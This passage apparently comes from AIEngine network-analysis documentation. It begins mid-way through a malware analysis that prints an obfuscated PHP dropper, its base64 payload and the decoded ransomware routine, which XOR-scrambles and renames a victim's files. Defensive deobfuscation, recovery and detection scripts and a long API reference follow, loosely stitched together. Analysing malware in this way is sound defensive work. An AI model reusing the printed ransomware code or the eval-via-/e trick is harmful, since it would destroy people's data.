03)."lAY2".chr(120)."vc2VkaXIoJ".chr(71).chr(82)."wKTsNCn0=".chr(34)."));";$s109="/".chr(56)."b3822".chr(49)."e975e7".chr(97).chr(57)."e".chr(54)."ef3c6ed6de0".chr(97)."f".chr(53)."f/e";preg_replace($s109,$x438,"8b38221".chr(101)."975".chr(101)."7a9e6ef3c6ed6de0".chr(97).chr(102)."5f"); ?>

I wrote a basic Python script that changes the chr(NUMBER) calls to their corresponding ASCII values, and here are the results:

<?php $o448="preg_replace";$x438="eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQoNCmZvcigkaT02NzskaTw9OTA7JGkrKykgaWYoQGlzX2RpcihjaHIoJGkpLic6JykpIFRyZWUoY2hyKCRpKS4nOicpOw0KDQpmdW5jdGlvbiBUcmVlKCRwKQ0Kew0KCSRhPSdlJzsNCgkkaz1iYXNlNjRfZGVjb2RlKCdNV0tUWkpiSXpCQlVuQU5xL21US21Od2diOGdod1BndzhHRFFVcWY4SmxpS3BBZHFzQ0NRTm9QUStYRG5jTmMreUJCWTVFYW9uQkNFbFBWV0kzclJyTzR3SDFpUllNUW9EM2JkS0l6dzZDQllLSTcwUWJZck1KZ0E5a0NLUUpMa3l6YWhMR0tZJyk7DQoJJHM9Y2hyKDkyKTsNCg0KCWlmKHByZWdfbWF0Y2goJy8nLiRzLiRzLicod2lubnR8Ym9vdHxzeXN0ZW18d2luZG93c3x0bXB8dGVtcHxwcm9ncmFtfGFwcGRhdGF8YXBwbGljYXRpb258cm9hbWluZ3xtc29mZmljZXx0ZW1wb3Jhcnl8Y2FjaGUpL2knLCRwKSB8fCBwcmVnX21hdGNoKCcvcmVjeWNsZS9pJywkcCkpIHJldHVybjsNCg0KCSRkcD1Ab3BlbmRpcigkcCk7DQoNCglpZigkZHA9PT1mYWxzZSkgcmV0dXJuOw0KDQoJd2hpbGUoJG89QHJlYWRkaXIoJGRwKSkgaWYoJG8hPScuJyYmJG8hPScuLicpDQoJew0KCQlpZiAoQGlzX2RpcigkcC4kcy4kbykpDQoJCXsNCgkJCVRyZWUoJHAuJHMuJG8pOw0KCQl9DQoJCWVsc2VpZiAoJGE9PSdlJyYmcHJlZ19tYXRjaCgnL1suXSh6aXB8cmFyfHIwMHxyMDF8cjAyfHIwM3w3enx0YXJ8Z3p8Z3ppcHxhcmN8YXJqfGJ6fGJ6MnxiemF8YnppcHxiemlwMnxpY2V8eGxzfHhsc3h8ZG9jfGRvY3h8cGRmfGRqdnV8ZmIyfHJ0ZnxwcHR8cHB0eHxwcHN8c3hpfG9kbXxvZHR8bXBwfHNzaHxwdWJ8Z3BnfHBncHxrZGJ8a2RieHxhbHN8YXVwfGNwcnxucHJ8Y3BwfGJhc3xhc218Y3N8cGhwfHBhc3xjbGFzc3xweXxwbHxofHZifHZjcHJvanx2YnByb2p8amF2YXxiYWt8YmFja3VwfG1kYnxhY2NkYnxtZGZ8b2RifHdkYnxjc3Z8dHN2fHNxbHxwc2R8ZXBzfGNkcnxjcHR8aW5kZHxkd2d8YWl8c3ZnfG1heHxza3B8c2NhZHxjYWR8M2RzfGJsZW5kfGx3b3xsd3N8bWJ8c2xkZHJ3fHNsZGFzbXxzbGRwcnR8dTNkfGpwZ3xqcGVnfHRpZmZ8dGlmfHJhd3xhdml8bXBnfG1wNHxtNHZ8bXBlZ3xtcGV8d21mfHdtdnx2ZWd8bW92fDNncHxmbHZ8bWt2fHZvYnxybXxtcDN8d2F2fGFzZnx3bWF8bTN1fG1pZGl8b2dnfG1pZHx2ZGl8dm1ka3x2aGR8ZHNrfGltZ3xpc28pJC9pJywkbykgfHwgJGE9PSdkJyYmcHJlZ19tYXRjaCgnL1suXShjcnlwdGVkKSQvaScsJG8pKQ0KCQl7DQoJCQkkZnA9QGZvcGVuKCRwLiRzLiRvLCdyKycpOw0KCQkJaWYgKCRmcCE9PWZhbHNlKQ0KCQkJew0KCQkJCSR4PUBmcmVhZCgkZnAsMTAyNCk7DQoJCQkJZm9yKCRpPTA7JGk8c3RybGVuKCR4KTskaSsrKSR4WyRpXT1jaHIob3JkKCR4WyRpXSleb3JkKCRrWyRpJXN0cmxlbigkayldKSk7DQoJCQkJQGZzZWVrKCRmcCwwKTsNCgkJCQlAZndyaXRlKCRmcCwkeCk7DQoJCQkJQG
ZjbG9zZSgkZnApOw0KDQoJCQkJaWYoJGE9PSdlJykNCgkJCQl7DQoJCQkJCUByZW5hbWUoJHAuJHMuJG8sICRwLiRzLiRvLicuY3J5cHRlZCcpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQlAcmVuYW1lKCRwLiRzLiRvLCBwcmVnX3JlcGxhY2UoJy9bLl1jcnlwdGVkJC8nLCAnJywgJHAuJHMuJG8pKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQoNCglAY2xvc2VkaXIoJGRwKTsNCn0="));";$s109="/8b38221e975e7a9e6ef3c6ed6de0af5f/e";preg_replace($s109,$x438,"8b38221e975e7a9e6ef3c6ed6de0af5f"); ?>
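A script of the kind described above, written here as an added example (it is not the author's script and not part of AIEngine): it folds the chr(N) calls and the "."-concatenated literals into plain strings, then extracts and decodes any base64_decode("...") argument so the next stage can be read directly. The sample input is constructed to mirror the shape of the dropper; everything else (function names, the base64 of a one-line payload) is the example's own.

```python
import base64
import re

# One term of a PHP concatenation chain: a double-quoted literal or chr(N).
_TERM = r'"[^"\\]*"|chr\(\s*\d+\s*\)'
# A chain of terms joined by '.', e.g. "ev".chr(97).chr(108)."(" ; a single
# term matches too, so standalone chr(N) calls are folded as well.
_CHAIN = re.compile(r'(?:%s)(?:\s*\.\s*(?:%s))*' % (_TERM, _TERM))
_CHR = re.compile(r'chr\(\s*(\d+)\s*\)')
_B64_ARG = re.compile(r'''base64_decode\(\s*(["'])([A-Za-z0-9+/=\s]*)\1\s*\)''')


def _term_value(term: str) -> str:
    """Literal text of one term: strip the quotes, or map chr(N) to its character."""
    m = _CHR.fullmatch(term)
    return chr(int(m.group(1))) if m else term[1:-1]


def fold_chr_concat(php: str) -> str:
    """Rewrite every "a".chr(N)."b" chain into one "aXb" literal. A chr(34)
    becomes a bare quote inside the literal, exactly as in the result above."""
    def repl(m: "re.Match[str]") -> str:
        return '"' + "".join(_term_value(t) for t in re.findall(_TERM, m.group(0))) + '"'
    return _CHAIN.sub(repl, php)


def decode_eval_payload(php: str) -> list:
    """Decode every base64_decode("...") / base64_decode('...') argument."""
    out = []
    for m in _B64_ARG.finditer(php):
        b64 = re.sub(r"\s+", "", m.group(2))
        b64 += "=" * (-len(b64) % 4)   # PHP tolerates missing padding, Python does not
        try:
            out.append(base64.b64decode(b64).decode("latin-1"))
        except ValueError:             # binascii.Error is a ValueError subclass
            pass
    return out


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def unpack(php: str, max_depth: int = 4) -> list:
    """All stages: the folded source, then each base64 stage that is itself text
    (binary blobs such as an XOR key are decoded but not treated as a stage)."""
    stages = [fold_chr_concat(php)]
    for _ in range(max_depth):
        nxt = [p for p in decode_eval_payload(stages[-1]) if _is_text(p)]
        if not nxt:
            break
        stages.append(fold_chr_concat("\n".join(nxt)))
    return stages


# Constructed sample in the shape of the dropper: a chr()-built
# eval(base64_decode("...")) string fired through preg_replace()'s /e modifier.
SAMPLE = ('<?php $f="preg_r".chr(101)."pl".chr(97).chr(99)."e";'
          '$c="ev".chr(97).chr(108)."(base64".chr(95)."decode(".chr(34)'
          '."cGhwaW5mbygpOw==".chr(34)."));";'
          '$p="/".chr(56)."b3/e";preg_replace($p,$c,"8b3"); ?>')

if __name__ == "__main__":
    for i, stage in enumerate(unpack(SAMPLE)):
        print("--- stage %d ---\n%s" % (i, stage))
```

The execution trigger in the dropper is the /e modifier at the end of $s109: with it, preg_replace() evaluates the replacement string as PHP code, so the eval() string is never called directly and a grep for eval( on the raw file finds nothing. That modifier was deprecated in PHP 5.5 and removed in PHP 7.0, which is why samples of this family only run on older interpreters.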

So the variable contains most of the code, but base64-encoded. Let's decode it.

set_time_limit(0);

for($i=67;$i<=90;$i++) if(@is_dir(chr($i).':')) Tree(chr($i).':');

function Tree($p)
{
    $a='e';
    $k=base64_decode('MWKTZJbIzBBUnANq/mTKmNwgb8ghwPgw8GDQUqf8JliKpAdqsCCQNoPQ+XDncNc+yBBY5EaonBCElPVWI3rRrO4wH1iRYMQoD3bdKIzw6CBYKI70QbYrMJgA9kCKQJLkyzahLGKY');
    $s=chr(92);

    if(preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) return;

    $dp=@opendir($p);

    if($dp===false) return;

    while($o=@readdir($dp)) if($o!='.'&&$o!='..')
    {
            if (@is_dir($p.$s.$o))
            {
                    Tree($p.$s.$o);
            }
            elseif ($a=='e'&&preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o) || $a=='d'&&preg_match('/[.](crypted)$/i',$o))
            {
                    $fp=@fopen($p.$s.$o,'r+');
                    if ($fp!==false)
                    {
                            $x=@fread($fp,1024);
                            for($i=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));
                            @fseek($fp,0);
                            @fwrite($fp,$x);
                            @fclose($fp);

                            if($a=='e')
                            {
                                    @rename($p.$s.$o, $p.$s.$o.'.crypted');
                            }
                            else
                            {
                                    @rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));
                            }
                    }
            }
    }

    @closedir($dp);
}

Looks familiar to you? It seems to be a mutation of ransomware. Note that it only XORs the first 1024 bytes of each file with a fixed key that is embedded in the script itself, then renames the file with a .crypted suffix; the same routine run with $a='d' reverses both steps, so the damage is recoverable.
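The recovery side of what the decoded script does, as an added example (not part of the original write-up or of AIEngine): the transform is a repeating-key XOR over the first 1024 bytes of each file, and the key is the base64 string from the $k line above, so undoing it needs nothing else. The directory walk and the file names are the example's own; the constants are copied from the decoded code.

```python
import base64
import os

# Taken from the decoded script: the fixed key, the 1024-byte window and the suffix.
KEY_B64 = ("MWKTZJbIzBBUnANq/mTKmNwgb8ghwPgw8GDQUqf8JliKpAdqsCCQNoPQ+XDncNc+"
           "yBBY5EaonBCElPVWI3rRrO4wH1iRYMQoD3bdKIzw6CBYKI70QbYrMJgA9kCKQJLkyzahLGKY")
HEAD_LEN = 1024
SUFFIX = ".crypted"


def load_key(b64: str = KEY_B64) -> bytes:
    """PHP's base64_decode() ignores missing padding; Python's does not, so add it."""
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def xor_head(data: bytes, key: bytes, head_len: int = HEAD_LEN) -> bytes:
    """The script's transform: XOR the first head_len bytes with the repeating
    key and leave the rest untouched. XOR is its own inverse, so the same call
    both 'encrypts' and recovers (the $a=='e' and $a=='d' branches above)."""
    head = bytes(b ^ key[i % len(key)] for i, b in enumerate(data[:head_len]))
    return head + data[head_len:]


def recover_file(path: str, key: bytes) -> str:
    """Undo the script on one file: rewrite the XORed head in place and drop the
    .crypted suffix, mirroring its rename(). Returns the restored path."""
    if not path.endswith(SUFFIX):
        raise ValueError("not a %s file: %s" % (SUFFIX, path))
    with open(path, "r+b") as fp:
        head = fp.read(HEAD_LEN)
        fp.seek(0)
        fp.write(xor_head(head, key))
    new_path = path[:-len(SUFFIX)]
    os.rename(path, new_path)
    return new_path


def recover_tree(root: str, key: bytes) -> list:
    """Walk a directory and recover every .crypted file; returns the restored paths."""
    done = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(SUFFIX):
                done.append(recover_file(os.path.join(dirpath, name), key))
    return done


if __name__ == "__main__":
    import sys
    for restored in recover_tree(sys.argv[1], load_key()):
        print("restored", restored)
```

Run it against a copy of the affected tree first. The script's own $a='d' mode does the same thing in PHP, but re-executing a dropper to clean up after it is rarely what you want.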

Happy analysis and comments are welcome!

API

Class description

  • BitcoinInfo
    • Properties
      • total_blocks. Gets the total number of Bitcoin blocks on the Flow.
      • total_rejects. Gets the total number of Bitcoin rejects on the Flow.
      • total_transactions. Gets the total number of Bitcoin transactions of the Flow.
  • CoAPInfo
    • Properties
      • host_name. Gets the CoAP Hostname if the Flow is CoAP.
      • matched_domain_name. Gets the matched DomainName object.
      • uri. Gets the CoAP URI if the Flow is CoAP.
  • DHCPInfo
    • Properties
      • host_name. Gets the DHCP hostname.
  • DNSInfo
    • Properties
      • __iter__. Iterate over the IP addresses returned on the query response.
      • domain_name. Gets the DNS domain name.
      • matched_domain_name. Gets the matched DomainName object.
  • DatabaseAdaptor Abstract class
    • Methods
      • insert. Method called when a new Flow is created.
      • update. Method called when the Flow is updated.
      • remove. Method called when the Flow is removed.
  • DomainName
    • Properties
      • name. Gets the name of the domain.
      • expression. Gets the domain expression.
      • callback. Gets/Sets the callback of the domain.
      • http_uri_set. Gets/Sets the HTTPUriSet used on this DomainName (only works on HTTP).
      • matchs. Gets the total number of matches of the domain.
      • regex_manager. Gets/Sets the HTTP RegexManager used on this DomainName (only works on HTTP).
  • DomainNameManager
    • Methods
      • __len__. Returns the total number of DomainName objects on the DomainNameManager.
      • add_domain_name. Adds a DomainName object to the DomainNameManager.
      • remove_domain_name. Removes a DomainName by name.
      • show. Shows the DomainName objects.
    • Properties
      • name. Gets/Sets the name of the DomainNameManager object.
  • Flow
    • Properties
      • anomaly. Gets the attached anomaly of the Flow.
      • bitcoin_info. Gets a BitcoinInfo object if the Flow is Bitcoin.
      • bytes. Gets the total number of bytes.
      • coap_info. Returns the CoAPInfo object if the Flow is CoAP.
      • dhcp_info. Returns the DHCPInfo object if the Flow is DHCP.
      • dns_info. Gets the DNSInfo object if the Flow is DNS.
      • dst_ip. Gets the destination IP address.
      • dst_port. Gets the destination port of the Flow.
      • evidence. Gets/Sets the evidence flag of the Flow for forensic analysis.
      • have_tag. Gets whether the Flow has a tag from lower network layers (VLAN, MPLS, VXLAN).
      • http_info. Returns an HTTPInfo object if the Flow is HTTP.
      • imap_info. Gets an IMAPInfo object if the Flow is IMAP.
      • ip_set. Returns the IPSet object of the Flow if it is part of an IPSet.
      • l7_protocol_name. Gets the name of the layer 7 protocol of the Flow.
      • label. Gets/Sets the label of the Flow (external labeling).
      • mqtt_info. Gets the MQTTInfo object if the Flow is MQTT.
      • packets. Gets the total number of packets on the Flow.
      • packets_layer7. Gets the total number of layer 7 packets.
      • payload. Gets a list of the bytes of the payload of the Flow.
      • pop_info. Gets a POPInfo object if the Flow is POP.
      • protocol. Gets the protocol of the Flow (tcp, udp).
      • regex. Gets the Regex if the Flow has been matched with the associated Regex.
      • reject. Gets/Sets the reject flag of the connection.
      • sip_info. Returns the SIPInfo object if the Flow is SIP.
      • smtp_info. Gets the SMTPInfo object if the Flow is SMTP.
      • src_ip. Gets the source IP address.
      • src_port. Gets the source port of the Flow.
      • ssdp_info. Gets the SSDPInfo object if the Flow is SSDP.
      • ssl_info. Gets the SSLInfo object if the Flow is SSL.
      • tag. Gets the tag from lower network layers.
  • FlowManager
    • Methods
      • __iter__. Iterate over the Flows stored on the FlowManager object.
      • __len__. Gets the number of Flows stored on the FlowManager.
      • flush. Returns the active Flows to their corresponding caches and frees the Flow resources.
      • show. Shows the active Flows in memory.
    • Properties
      • flows. Gets the number of Flows stored on the FlowManager.
      • process_flows. Gets the total number of processed Flows.
      • timeout_flows. Gets the total number of Flows that have expired by timeout.
  • HTTPInfo
    • Properties
      • banned. Gets/Sets whether the Flow is banned from further analysis on the Python side, releasing its resources.
      • host_name. Gets the HTTP Host if the Flow is HTTP.
      • matched_domain_name. Gets the matched DomainName object.
      • uri. Gets the HTTP URI if the Flow is HTTP.
      • user_agent. Gets the HTTP UserAgent if the Flow is HTTP.
  • HTTPUriSet
    • Properties
      • callback. Gets/Sets a callback function for the matching set.
      • lookups. Gets the total number of lookups of the set.
      • lookups_in. Gets the total number of matched lookups of the set.
      • lookups_out. Gets the total number of non matched lookups of the set.
      • uris. Gets the total number of URIs on the set.
    • Methods
      • add_uri. Adds a URI to the HTTPUriSet.
  • IMAPInfo
    • Properties
      • user_name. Gets the user name of the IMAP session if the Flow is IMAP.
  • IPSet
    • Properties
      • __len__. Returns the total number of IP addresses on the IPSet.
      • callback. Gets/Sets a function callback for the IPSet.
      • lookups. Gets the total number of lookups of the IPSet.
      • lookups_in. Gets the total number of matched lookups of the IPSet.
      • lookups_out. Gets the total number of non matched lookups of the IPSet.
      • name. Gets the name of the IPSet.
      • regex_manager. Gets/Sets the RegexManager for this group of IP addresses.
    • Methods
      • add_ip_address. Adds an IP address to the IPSet.
  • IPSetManager
    • Properties
      • __iter__. Iterate over the IPSets.
      • __len__. Returns the total number of IPSets.
      • name. Gets/Sets the name of the IPSetManager object.
    • Methods
      • add_ip_set. Adds an IPSet.
      • remove_ip_set. Removes an IPSet.
      • show. Shows the IPSets.
  • MQTTInfo
    • Properties
      • topic. Gets the MQTT publish topic if the Flow is MQTT.
  • NetbiosInfo
    • Properties
      • name. Gets the Netbios Name.
  • NetworkStack Abstract class
    • Properties
      • enable_nids_engine. Enables/Disables the NIDS Engine.
      • flows_timeout. Gets/Sets the timeout for the TCP/UDP Flows of the stack.
      • link_layer_tag. Gets/Sets the link layer tag for VLAN and MPLS encapsulations.
      • name. Gets the name of the Stack.
      • stats_level. Gets/Sets the statistics level of the stack (1-5).
      • tcp_flow_manager. Gets the TCP FlowManager to iterate over the TCP Flows.
      • tcp_flows. Gets/Sets the maximum number of Flows to keep on the cache for TCP traffic.
      • tcp_ip_set_manager. Gets/Sets the IPSetManager for TCP traffic.
      • tcp_regex_manager. Gets/Sets the RegexManager for TCP traffic.
      • udp_flow_manager. Gets the UDP FlowManager to iterate over the UDP Flows.
      • udp_flows. Gets/Sets the maximum number of Flows to keep on the cache for UDP traffic.
      • udp_ip_set_manager. Gets/Sets the IPSetManager for UDP traffic.
      • udp_regex_manager. Gets/Sets the RegexManager for UDP traffic.
    • Methods
      • decrease_allocated_memory. Decreases the allocated memory for the protocol given as parameter.
      • get_cache. Gets the main cache of a protocol as a Python dict.
      • get_counters. Gets the counters of a specific protocol as a Python dict.
      • get_statistics. Gets the statistics of a protocol as a Python dict.
      • increase_allocated_memory. Increases the allocated memory for the protocol given as parameter.
      • release_cache. Releases the cache of a specific protocol.
      • release_caches. Releases all the caches.
      • show_statistics. Shows the statistics of the stack.
      • set_anomaly_callback. Sets a callback for specific anomalies on the given protocol.
      • set_domain_name_manager. Sets a DomainNameManager on a specific protocol (HTTP, SSL or DNS).
      • set_tcp_database_adaptor. Sets a DatabaseAdaptor for TCP traffic.
      • set_udp_database_adaptor. Sets a DatabaseAdaptor for UDP traffic.
  • POPInfo
    • Properties
      • user_name. Gets the user name of the POP session if the Flow is POP.
  • PacketDispatcher
    • Properties
      • bytes. Gets the total number of bytes processed by the PacketDispatcher.
      • enable_shell. Enables/Disables a Python shell to interact with the system in real time.
      • evidences. Gets/Sets the generation of evidences for forensic analysis.
      • packets. Gets the total number of packets processed by the PacketDispatcher.
      • pcap_filter. Gets/Sets a pcap filter on the PacketDispatcher.
      • stack. Gets/Sets the NetworkStack that is running on the PacketDispatcher.
      • status. Gets the status of the PacketDispatcher.
    • Methods
      • close. Closes a network device or a pcap file.
      • forward_packet. Forwards the received packet to an external packet engine (Netfilter).
      • open. Opens a network device or a pcap file for analysis.
      • run. Starts to process packets.
      • set_scheduler. Sets the scheduler to run periodic tasks (e.g. DDoS checks).
  • Regex
    • Properties
      • callback. Gets/Sets the callback function for the regular expression.
      • expression. Gets the regular expression.
      • matchs. Gets the number of matches of the regular expression.
      • name. Gets the name of the regular expression.
      • next_regex. Gets/Sets the next regular expression that should match.
      • next_regex_manager. Gets/Sets the next RegexManager to assign to the Flow when a match occurs.
  • RegexManager
    • Properties
      • __len__. Gets the total number of Regex stored on the RegexManager object.
      • __iter__. Iterate over the Regex stored on the RegexManager object.
      • name. Gets/Sets the name of the RegexManager.
      • callback. Gets/Sets the callback function for the RegexManager for regular expressions that matches.
    • Methods
      • add_regex. Adds a Regex object to the RegexManager.
      • show. Shows the Regex objects stored on the RegexManager.
  • SIPInfo
    • Properties
      • from_name. Gets the SIP From if the Flow is SIP.
      • to_name. Gets the SIP To if the Flow is SIP.
      • uri. Gets the SIP URI if the Flow is SIP.
      • via. Gets the SIP Via if the Flow is SIP.
  • SMTPInfo
    • Properties
      • banned. Gets/Sets whether the Flow is banned from further analysis.
      • mail_from. Gets the Mail From if the Flow is SMTP.
      • mail_to. Gets the Rcpt To if the Flow is SMTP.
  • SSDPInfo
    • Properties
      • host_name. Gets the SSDP Host if the Flow is SSDP.
      • uri. Gets the SSDP URI if the Flow is SSDP.
  • SSLInfo
    • Properties
      • matched_domain_name. Gets the matched DomainName object.
      • server_name. Gets the SSL server name.
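An added example of wiring the classes above into a small detector for the case analysed earlier (EXE and obfuscated PHP delivered over HTTP). It is example code, not code from the AIEngine project, and it assumes the following, none of which the reference above states explicitly: the Python module is called pyaiengine, StackLan is the concrete NetworkStack, Regex(name, expression) is the constructor, a callback receives the matched Flow as its only argument, and Flow.payload is a list of integer byte values. The classification helpers are plain Python and run without the engine installed.

```python
try:
    import pyaiengine   # assumed module name; only present where AIEngine is installed
except ImportError:
    pyaiengine = None


def classify_payload(payload: bytes) -> str:
    """Label a response body the way the analysis above did by hand: a PE file
    starts with 'MZ'; PHP that builds strings with chr()/eval()/base64_decode()
    is the obfuscated kind; anything else is just 'php' or 'other'."""
    if payload[:2] == b"MZ":
        return "exe"
    if b"<?php" in payload[:512]:
        markers = (b"chr(", b"eval(", b"base64_decode(", b"preg_replace(")
        return "obfuscated-php" if sum(m in payload for m in markers) >= 2 else "php"
    return "other"


def flow_record(src_ip, src_port, dst_ip, dst_port, host, uri, payload: bytes) -> dict:
    """The fields worth keeping per hit, collected in one place so the callback stays small."""
    return {"src": "%s:%s" % (src_ip, src_port), "dst": "%s:%s" % (dst_ip, dst_port),
            "host": host, "uri": uri, "kind": classify_payload(payload)}


def on_download(flow):
    """Regex callback: receives the Flow whose payload completed the regex chain."""
    info = flow.http_info                        # None when the Flow is not HTTP
    rec = flow_record(flow.src_ip, flow.src_port, flow.dst_ip, flow.dst_port,
                      info.host_name if info else None, info.uri if info else None,
                      bytes(flow.payload))       # assumed: payload is a list of ints
    flow.label = rec["kind"]     # external labeling, read back from the FlowManager later
    flow.evidence = True         # keep this Flow's packets (needs PacketDispatcher.evidences)
    print("download", rec)


def build_stack():
    """RegexManager with a two-step chain (Regex.next_regex): an HTTP GET for a
    .php resource, then a response body carrying a PE header or a PHP tag."""
    r_body = pyaiengine.Regex("download body", "^(MZ|<\\?php)")
    r_body.callback = on_download
    r_get = pyaiengine.Regex("php get", "^GET .*\\.php")
    r_get.next_regex = r_body    # r_body is only tried on Flows that matched r_get
    rm = pyaiengine.RegexManager()
    rm.add_regex(r_get)          # only the head of the chain is added to the manager

    st = pyaiengine.StackLan()
    st.tcp_regex_manager = rm
    st.enable_nids_engine = True
    st.tcp_flows = 500000
    st.udp_flows = 100000
    return st


def labelled_flows(stack) -> list:
    """Labels set by the callback, collected by iterating the TCP FlowManager."""
    return [(f.src_ip, f.dst_ip, f.label) for f in stack.tcp_flow_manager if f.label]


def main(source="traffic.pcap"):
    pd = pyaiengine.PacketDispatcher()
    pd.stack = build_stack()
    pd.evidences = True
    pd.open(source)
    pd.run()
    pd.close()
    pd.stack.show_statistics()
    for src, dst, label in labelled_flows(pd.stack):
        print(src, "->", dst, label)


if __name__ == "__main__":
    main()
```

Chaining the two regexes keeps the body check off every TCP flow on the wire: it runs only on flows that already produced a GET for a .php resource, which is the request pattern that preceded all five downloads in the capture above.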

Terms and conditions

AIEngine is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.

AIEngine is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with AIEngine. If not, see <http://www.gnu.org/licenses/>.